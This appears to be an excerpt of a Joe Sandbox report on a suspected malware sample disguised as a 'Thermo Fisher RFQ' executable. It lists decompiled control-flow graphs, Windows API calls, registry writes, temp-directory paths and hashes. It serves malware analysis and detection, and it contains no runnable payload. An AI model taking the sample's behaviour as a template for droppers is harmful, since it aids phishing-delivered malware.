                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll
                                              • API String ID: 2531174081-1402984587
                                              • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                              • Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
                                              • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                              • Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 874 4032d9-4032f0 875 4032f2 874->875 876 4032f9-403302 874->876 875->876 877 403304 876->877 878 40330b-403310 876->878 877->878 879 403320-40332d call 4034d1 878->879 880 403312-40331b call 4034e7 878->880 884 403333-403337 879->884 885 4034bf 879->885 880->879 886 40346a-40346c 884->886 887 40333d-403363 GetTickCount 884->887 888 4034c1-4034c2 885->888 889 4034ac-4034af 886->889 890 40346e-403471 886->890 891 4034c7 887->891 892 403369-403371 887->892 893 4034ca-4034ce 888->893 897 4034b1 889->897 898 4034b4-4034bd call 4034d1 889->898 890->891 894 403473 890->894 891->893 895 403373 892->895 896 403376-403384 call 4034d1 892->896 899 403476-40347c 894->899 895->896 896->885 908 40338a-403393 896->908 897->898 898->885 906 4034c4 898->906 903 403480-40348e call 4034d1 899->903 904 40347e 899->904 903->885 911 403490-40349c call 4060f6 903->911 904->903 906->891 910 403399-4033b9 call 406aa3 908->910 916 403462-403464 910->916 917 4033bf-4033d2 GetTickCount 910->917 918 403466-403468 911->918 919 40349e-4034a8 911->919 916->888 920 4033d4-4033dc 917->920 921 40341d-40341f 917->921 918->888 919->899 924 4034aa 919->924 925 4033e4-403415 MulDiv wsprintfW call 4055d9 920->925 926 4033de-4033e2 920->926 922 403421-403425 921->922 923 403456-40345a 921->923 928 403427-40342e call 4060f6 922->928 929 40343c-403447 922->929 923->892 930 403460 923->930 924->891 931 40341a 925->931 926->921 926->925 934 403433-403435 928->934 933 40344a-40344e 929->933 930->891 931->921 933->910 935 403454 933->935 934->918 936 403437-40343a 934->936 935->891 936->933
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CountTick$wsprintf
                                              • String ID: ... %d%%$STy
                                              • API String ID: 551687249-2882605797
                                              • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                              • Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
                                              • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                              • Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 937 402711-40272a call 402da9 940 402730-402737 937->940 941 402c4f-402c52 937->941 942 402739 940->942 943 40273c-40273f 940->943 944 402c58-402c5e 941->944 942->943 945 4028a3-4028ab 943->945 946 402745-402754 call 4064b4 943->946 945->941 946->945 950 40275a 946->950 951 402760-402764 950->951 952 4027f9-4027fc 951->952 953 40276a-402785 ReadFile 951->953 955 402814-402824 call 4060c7 952->955 956 4027fe-402801 952->956 953->945 954 40278b-402790 953->954 954->945 957 402796-4027a4 954->957 955->945 964 402826 955->964 956->955 958 402803-40280e call 406125 956->958 961 4027aa-4027bc MultiByteToWideChar 957->961 962 40285f-40286b call 40649b 957->962 958->945 958->955 961->964 965 4027be-4027c1 961->965 962->944 968 402829-40282c 964->968 969 4027c3-4027ce 965->969 968->962 971 40282e-402833 968->971 969->968 972 4027d0-4027f5 SetFilePointer MultiByteToWideChar 969->972 973 402870-402874 971->973 974 402835-40283a 971->974 972->969 975 4027f7 972->975 977 402891-40289d SetFilePointer 973->977 978 402876-40287a 973->978 974->973 976 40283c-40284f 974->976 975->964 976->945 979 402851-402857 976->979 977->945 980 402882-40288f 978->980 981 40287c-402880 978->981 979->951 982 40285d 979->982 980->945 981->977 981->980 982->945
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004027B8
                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004027DB
                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004027F1
                                                • Part of subcall function 00406125: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026F6,00000000,00000000,?,00000000,00000011), ref: 0040613B
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              • Opcode ID: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
                                              • Instruction ID: 94532b36e9b1b55a0417b46d3f551769048a354c57792839695d4204f468be83
                                              • Opcode Fuzzy Hash: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
                                              • Instruction Fuzzy Hash: D6510C75D04119AADF20EFD4CA84AAEBBB9FF44304F14817BE541B62D0D7B89D82CB58

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 983 4068d8-4068f8 GetSystemDirectoryW 984 4068fa 983->984 985 4068fc-4068fe 983->985 984->985 986 406900-406909 985->986 987 40690f-406911 985->987 986->987 988 40690b-40690d 986->988 989 406912-406945 wsprintfW LoadLibraryExW 987->989 988->989
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                              • wsprintfW.USER32 ref: 0040692A
                                              • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040693E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME
                                              • API String ID: 2200240437-1106614640
                                              • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                              • Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
                                              • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                              • Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 990 6fe71817-6fe71856 call 6fe71bff 994 6fe71976-6fe71978 990->994 995 6fe7185c-6fe71860 990->995 996 6fe71862-6fe71868 call 6fe7243e 995->996 997 6fe71869-6fe71876 call 6fe72480 995->997 996->997 1002 6fe718a6-6fe718ad 997->1002 1003 6fe71878-6fe7187d 997->1003 1004 6fe718af-6fe718cb call 6fe72655 call 6fe71654 call 6fe71312 GlobalFree 1002->1004 1005 6fe718cd-6fe718d1 1002->1005 1006 6fe7187f-6fe71880 1003->1006 1007 6fe71898-6fe7189b 1003->1007 1030 6fe71925-6fe71929 1004->1030 1008 6fe718d3-6fe7191c call 6fe71666 call 6fe72655 1005->1008 1009 6fe7191e-6fe71924 call 6fe72655 1005->1009 1012 6fe71882-6fe71883 1006->1012 1013 6fe71888-6fe71889 call 6fe72b98 1006->1013 1007->1002 1010 6fe7189d-6fe7189e call 6fe72e23 1007->1010 1008->1030 1009->1030 1023 6fe718a3 1010->1023 1018 6fe71885-6fe71886 1012->1018 1019 6fe71890-6fe71896 call 6fe72810 1012->1019 1026 6fe7188e 1013->1026 1018->1002 1018->1013 1029 6fe718a5 1019->1029 1023->1029 1026->1023 1029->1002 1033 6fe71966-6fe7196d 1030->1033 1034 6fe7192b-6fe71939 call 6fe72618 1030->1034 1033->994 1036 6fe7196f-6fe71970 GlobalFree 1033->1036 1040 6fe71951-6fe71958 1034->1040 1041 6fe7193b-6fe7193e 1034->1041 1036->994 1040->1033 1042 6fe7195a-6fe71965 call 6fe715dd 1040->1042 1041->1040 1043 6fe71940-6fe71948 1041->1043 1042->1033 1043->1040 1045 6fe7194a-6fe7194b FreeLibrary 1043->1045 1045->1040
                                              APIs
                                                • Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E74
                                                • Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E79
                                                • Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E7E
                                              • GlobalFree.KERNEL32(00000000), ref: 6FE718C5
                                              • FreeLibrary.KERNEL32(?), ref: 6FE7194B
                                              • GlobalFree.KERNEL32(00000000), ref: 6FE71970
                                                • Part of subcall function 6FE7243E: GlobalAlloc.KERNEL32(?,?), ref: 6FE7246F
                                                • Part of subcall function 6FE72810: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,6FE71896,00000000), ref: 6FE728E0
                                                • Part of subcall function 6FE71666: wsprintfW.USER32 ref: 6FE71694
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                              • String ID:
                                              • API String ID: 3962662361-3916222277
                                              • Opcode ID: fb37fe3cd0158646ccaa4aa5f4a273c045e5d3a0759eb33e4a8a894ff913a92c
                                              • Instruction ID: e462397ba08299e837d55f8185e480023b169b366e77ab6549465ad5e67ac609
                                              • Opcode Fuzzy Hash: fb37fe3cd0158646ccaa4aa5f4a273c045e5d3a0759eb33e4a8a894ff913a92c
                                              • Instruction Fuzzy Hash: 9541A0718003419AEB209FB4D894BD67FA8BF0635CF24446AE9549A1DADF7CA085DB60

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1047 4024af-4024e0 call 402dcb * 2 call 402e5b 1054 4024e6-4024f0 1047->1054 1055 402c4f-402c5e 1047->1055 1056 4024f2-4024ff call 402dcb lstrlenW 1054->1056 1057 402503-402506 1054->1057 1056->1057 1060 402508-402519 call 402da9 1057->1060 1061 40251a-40251d 1057->1061 1060->1061 1065 40252e-402542 RegSetValueExW 1061->1065 1066 40251f-402529 call 4032d9 1061->1066 1069 402544 1065->1069 1070 402547-402628 RegCloseKey 1065->1070 1066->1065 1069->1070 1070->1055
                                              APIs
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024FA
                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040253A
                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402622
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CloseValuelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp
                                              • API String ID: 2655323295-1169235787
                                              • Opcode ID: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
                                              • Instruction ID: b5124b365774ee0dd77fffeda1a995c18ababb59e8a55150708f98195cc7d2d6
                                              • Opcode Fuzzy Hash: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
                                              • Instruction Fuzzy Hash: B8117231D00114BEDB01EFA59E59AAEB6B4EF54358F20443FF504B61D1C7B88E40966C

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1072 406073-40607f 1073 406080-4060b4 GetTickCount GetTempFileNameW 1072->1073 1074 4060c3-4060c5 1073->1074 1075 4060b6-4060b8 1073->1075 1077 4060bd-4060c0 1074->1077 1075->1073 1076 4060ba 1075->1076 1076->1077
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00406091
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-944333549
                                              • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                              • Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
                                              • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                              • Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768
                                              APIs
                                                • Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405EDC
                                                • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                                • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040163F
                                                • Part of subcall function 00405AA8: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards,?,00000000,?), ref: 00401672
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards, xrefs: 00401665
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards
                                              • API String ID: 1892508949-1958581672
                                              • Opcode ID: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
                                              • Instruction ID: 2b03c7a92312b5a1b0d009ad41e3f6a941738229f321331d68055a18e38198b9
                                              • Opcode Fuzzy Hash: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
                                              • Instruction Fuzzy Hash: 4511D031504514EBCF207FA5CD056AF36A0EF04368B25493FE941B22F1D63D4A81DA5E
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406693,80000002), ref: 00406468
                                              • RegCloseKey.KERNELBASE(?), ref: 00406473
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID: Call
                                              • API String ID: 3356406503-1824292864
                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                              • Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                              • Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00402128
                                                • Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                • Part of subcall function 004055D9: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,0040341A,0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0), ref: 00405634
                                                • Part of subcall function 004055D9: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 00405646
                                                • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                              • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00402139
                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,?,00000001,?), ref: 004021B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
